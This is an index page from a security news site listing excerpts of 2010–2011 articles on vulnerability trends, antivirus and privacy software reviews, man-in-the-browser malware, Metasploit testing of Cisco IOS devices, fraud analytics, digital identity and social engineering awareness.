A+ R A-

HelpNET Articles

by Stefan Frei - Research Analyst Director, Secunia - Monday, 24 January 2011.

There is an on-going arms-race in the IT security industry between vendors striving to produce secure software, and researchers’ and cybercriminals’ efforts (and successes) in finding new vulnerabilities in software. The number of vulnerabilities in general over the last five years reached over 4,300 on average per year with no significant up- or downward trend. During the period from 2009 to 2010, the number actu...

by Nick Lowe - Check Point - Monday, 17 January 2011.

Predicting the distant future of IT security is tricky, but the near future – the next 12 to 18 months – is a little easier. After all, the seeds of what is to come were planted in the recent past. Traditional security threats posed by hackers, viruses and worms over the past 10-plus years are still a concern, and have been joined by newer, emerging threats from the proliferation of Web 2.0 apps, mobile computing and custom attacks.


Avast! Free Antivirus (v.5.1.864) is an anti-virus, anti-spyware software with boot-time scanning capabilities. It also incorporates anti-rootkit and strong self-protection capabilities, and contains several real-time "Shields" which continuously monitor your email and internet connections and check the files on your computer whenever they are opened or closed.

The installation process is a breeze, and you can choose a custom installation if you want. You are also offered to install Google's Chrome browser, but you can decline if you don't want to. After an initial quick scan of the system, the process is complete and you can start the program.

When it starts, you are immediately asked to register it, and you should if you want to use it beyond the 30-days trial period and to receive virus database updates.

Welcome screen (click on the screenshots to enlarge it):

As you can see, in the Maintenance tab you can update virus signatures and the software, register it, and access the Virus Chest (usually called Quarantine in antivirus software - the place where found malware is removed to).

Before starting anything, let's check the general setting first. There you can configure things like the size of the virus chest, how long will the popups "last", various updates and exclusions of paths to be scanned, set up e-mail alerts when malware is found, set up a password for accessing the software or its various areas, select silent/gaming mode, sounds and language, automatic deletion of logs after a determined period of time, and troubleshooting settings:

When you finish with that, you can proceed to configuring the settings of the various Real-time Shields: File System, Mail, Web, P2P, IM, Network and Behavior. They are all running by default, but can also be turned off. If you do so, you will usually be asked to confirm the action:

Every shield can be closely configured by accessing and changing its Expert Settings. If you are a novice and not comfortable doing that, simply leave them as they are.

The File System Shield can be set to scan programs, scripts and DLLs when executing or loading, files when opening and auto-run items when removable media is attached to the computer. Some settings are the same for every shield, such as exclusions to rules, actions that the software is set to make when viruses or potentially unwanted or suspicious software is found, testing sensitivity, and the report option.

 1  |  2  |   Next page >> 

by Zeljka Zorz - Thursday, 30 December 2010.

Steganos Privacy Suite (v.12) is a suite offering most Steganos privacy and encryption products bundled up together: Safe, Portable Safe, Crypt & Hide, Password Manager, Private Favorites, E-Mail Encryption, Trace Destructor and Shredder.

Welcome screen:

A simple click on any of the icons on the left part of the screen will take you to the tool you need.

Since I have previously presented Steganos Safe, Portable Safe and Shredder on this site, I won't be going into details about their functioning - I will just mention new features of the tools (if there are any).

Safe and Personal Safe

The only new feature in the Safe tool is the option of hiding (attaching) a Safe in a video, audio or executable file without affecting its form or function. This way, you can still run those files, but the Safe will have the additional bonus of being hidden in plain sight. Unfortunately, forensic tools can detect its existence, but the Safe can't be open without the right password. Also, you can hide a Safe in one of those files only if it doesn't exceed 3 GB in size.

Crypt & Hide

Used for encrypting and hiding files and folders:

With one click of a mouse, you can add or remove, save, hide or extract files. To save and hide them, you will need to provide a password to restrict access to it and to open it again. Original files must be deleted by hand.

Password Manager

To use it, you must first create a user profile and secure it with a password. Then, you can enter/edit bank account/credit card and general information:

When you close the database, it is automatically encrypted. If you are a Firefox user, the software will automatically add a toolbar on your browser that will help you access and use your data, passwords and Private Favorites.

Private Favorites

As with the Password Manager, you must first create a user profile. This tool helps you manage Internet addresses and make them invisible to third parties that might be using your computer.

E-Mail Encryption

To use this tool, an e-mail program must be associated with it - the association is created in the Default Programs control panel. You can encrypt entire e-mails as components or only part of the text you entered in the apposite field. The sent file is self-decrypting, but you need to provide the password for the recipient to be able to do that.

 1  |  2  |   Next page >> 

by Mickey Boodaei - CEO Trusteer - Monday, 27 December 2010.

Evidence is everywhere that cyber criminals exist, and they’re able to make a substantial living from their illegal activities. While it is true that many are focusing their efforts on individuals, others have their sights set much higher. They are targeting enterprises to steal their highly prized intellectual property, log-in credentials, financial data and other sensitive information that resides within the once safe confines of the corporate network or in web applications.

Numerous articles have written on why you need to protect this data. Instead we’re going to focus on the business at hand – the "Man in the Browser". How is he getting into enterprise networks and applications and, more importantly, how you can stop him?

The browser has emerged as the weakest link in an enterprise’s security infrastructure. It is being successfully exploited by malware authors and criminals who use this method to steal logon credentials and inject Trojans that crack IT systems wide open, often undetected.

With these browser sessions often containing the logon details for email systems, VPNs, cloud services – such as cloud CRM, it is a critical area to secure and lock down without impacting performance.

However, the growing demand for mobility makes this easier said than done. Once upon a time, remote access to enterprise resources was the privilege of a chosen few employees, who used standard computers owned and managed by the enterprise, making security a big, yet ultimately manageable, task. Today such access capabilities have exploded to allow virtually any employee, contractor and partner to gain entry.

The problem is further compounded as these ‘trusted users’ are allowed to choose their laptop and smartphone, as well as utilize their home PC for work purposes and generally control their own IT environment. With more resources for them to access, and in the majority of cases not contained within a protected server farm – they’re literally out there in the wild. It is this adoption of unmanaged home-and-work laptops and personal PCs that has lead, in many cases, to malware infestations.

It’s not safe out there

With more than 57,000 new malicious sites created each week, most of which mimic prominent web sites, it’s hard not to stumble upon a spoof site and get infected. As users innocently browse these ‘respectable’ sites, they could inadvertently fall victim to drive-by-infections. However these attacks aren’t just on spoof/phishing sites they also reside on legitimate websites that have been infected with malware, and the criminals use search engine optimization (SEO) techniques to raise them to top of search engines to maximize the number of people infected.

 1  |  2  |  3  |   Next page >> 

by HD Moore - CSO at Rapid7 - Tuesday, 21 December 2010.

The Metasploit Framework and the commercial Metasploit products have always provided features for assessing the security of network devices. With the latest release, we took this a step further and focused on accelerating the penetration testing process for Cisco IOS devices. While the individual modules and supporting libraries were added to the open source framework, the commercial products can now chain these modules together to quickly compromise all vulnerable devices on the network. The screen shot below gives you an idea of what a successful penetration test can look like:

To begin with, I should state that a properly configured Cisco device is a tough target to crack. Vulnerabilities exist in IOS, just like any other piece of software, but only a few folks have managed to leverage memory corruption flaws into code execution. For this reason, the majority of real-world attacks against IOS devices tend to focus on two areas: poor configuration and weak passwords.

Before we dive into the specifics, lets review the current “state of the art” in Cisco IOS security testing. Vulnerability scanners do a great job of identifying out of date IOS installations by comparing version strings. This works well for determining whether a device is patched, but doesn’t help a penetration tester who doesn’t have a deep background in IOS exploitation. With few exceptions, this leaves a small number of services that are commonly exposed in production environments. These services include SNMP, Telnet, SSH, and HTTP. You may also find Finger running or relay services for media protocols like SIP and H.323. For remote access, the first four are what most of us have to work with, and even then, its rare to find a properly configured router with any of those services exposed to the network at large.

The Cisco IOS HTTP service has a few well-known vulnerabilities on older versions of the operating system. The two we care about as penetration testers both relate to authentication bypass. The first flaw, CVE-2000-0945, relates to missing authentication in the IOS Device Manager interface. This vulnerability allows unauthenticated, often privileged access to the IOS installation through the web interface. The second vulnerability, CVE-02001-0537, allows an attacker to bypass authentication by specifying an authentication level higher than “15″ in the request to the HTTP service. This also provides privileged access to the device through the web interface. The open source Metasploit Framework now provides two modules for exploiting these vulnerabilities:

 1  |  2  |  3  |  4  |   Next page >> 

by Graham Kemp - Head of public sector, SAS UK - Monday, 20 December 2010.

Where there is money, there is the potential for misappropriation or misuse – intentional or otherwise. Nowhere is this more apparent than in governments where funds are held accountable to a cynical taxpaying public. As such, it’s no surprise that millions of pounds can be siphoned away from worthy programs due to problems with process, lack of transparency or outright fraud.

The National Fraud Authority (NFA) recently identified that around £25 billion of taxpayers' money is wasted every year through fraud and error in the public sector. With figures like these, it is easy to see that the UK government faces enormous challenges in attempting to prevent improper payments caused by fraud and error. But are such misuses of government funds controllable at lower levels, or avoidable altogether?

The answer is yes – with the right tools. A significant portion of government-funded fraud and error can not only be identified and more effectively recovered; it can be prevented – simply by gaining deeper insights into existing records of program activities and financial data.

However, these insights cannot be achieved without the right plan and tools in place. To effectively manage the risks associated with fraud and improper payments, there are five steps that government departments should take to ensure the taxpayer funds are making their way into the right pockets.

Step 1: Gain a cohesive, agency-wide view of program activity

The most pressing challenge that government organizations face is that data systems containing information relevant to fraud and error cannot share information with one another. This lack of cohesion is causing errors or fraudulent actions to slip through the cracks.

By integrating technologies that support program, recipient and financial data, government agencies can break down internal data silos to bring vital information into a single, unified frame.

Step 2: Apply analytics that detect potentially fraudulent activity

Government departments have as much (in some cases more) data as any organization in the country. However, most have no way to sift through all of this data to detect indicators of fraud. With the right analytical techniques, an agency can identify fraudulent claims before they are paid, and prioritize for investigation those payments that appear to be improper.

By deploying advanced analytics and analytical techniques to deliver insights applicable to a number of issues, agencies can rapidly detect existing and emerging fraud schemes and patterns before they cause serious problems.

 1  |  2  |   Next page >> 

In the past decade our identity has undeniably evolved, we're preoccupied with identity theft and authentication issues, while governments work to adopt open identity technologies. David Mahdi, a Product Manager at Entrust, explains the critical issues in understanding the very nature of identity in a society actively building bridges between the real and digital world.

What are the critical issues in understanding the very nature of identity in a society actively building bridges between the real and digital world?

While one’s identity in a digital world is analogous to what it is in the traditional “real” world, the challenges and issues associated with trusting one’s digital identity, managing it, and securing it are very different between these two worlds.

The core value to one’s digital identity is Trust. In the real world an individual is able to easily confirm their identity by presenting documents, such as a passport or driver’s license, that have been issued by authorities, based on verifiable information provided by the individual. And because these authorities (such as governments) are trusted, the documents, or credentials they issue can be used by the individual to prove their identity with many different organizations that might be offering services.

In the digital world, however, trust is not as easy to determine. Like the real world, a digital identity must be issued by a trusted authority. The extent to which that digital identity can be used may well be a function of the trust that other organizations put in that Authority. In some cases a digital identity may be issued by a single Authority - a bank, a retailer or even a government agency - and that identity may only be used with that Authority. As a result, to take advantage of the digital world, individuals may have many digital identities. This, however, is not ideal. If the Authority that issues a digital identity is trusted by other organizations, in much the same way that a government issuing passports is trusted, then the digital identities they issue could also be trusted by other organizations, and be used more broadly. But establishing that trust is one of the key challenges of the digital world.

As a result, an individual’s digital identity may actually consist of many different identities, issued by many different organizations, and generally they’ll be used only and trusted by the organization that issued them. This creates a bit of a management nightmare for individuals in the online world as they’re faced with keeping track of which identity is used with which organization, where that identity is stored electronically and, most importantly, how to protect it.

 1  |  2  |  3  |  4  |  5  |   Next page >> 

by Mirko Zorz - Friday, 17 December 2010.

Jayson E. Street is the Chief Infosec Officer at Stratagem 1 Solutions, the author of the book Dissecting the hack: the f0rb1dd3n network and a well-known information security speaker.

Jayson offers advice for companies on how to prepare themselves for potentially dangerous social engineering situations:

  • Basic security awareness training, the best way to do it and how to encourage your employees.
  • Constant reinforcement of security practices and ideals, and how that keeps you safe.
  • How to create a positive environment where security is enforced long after training is over.

Page 1 of 8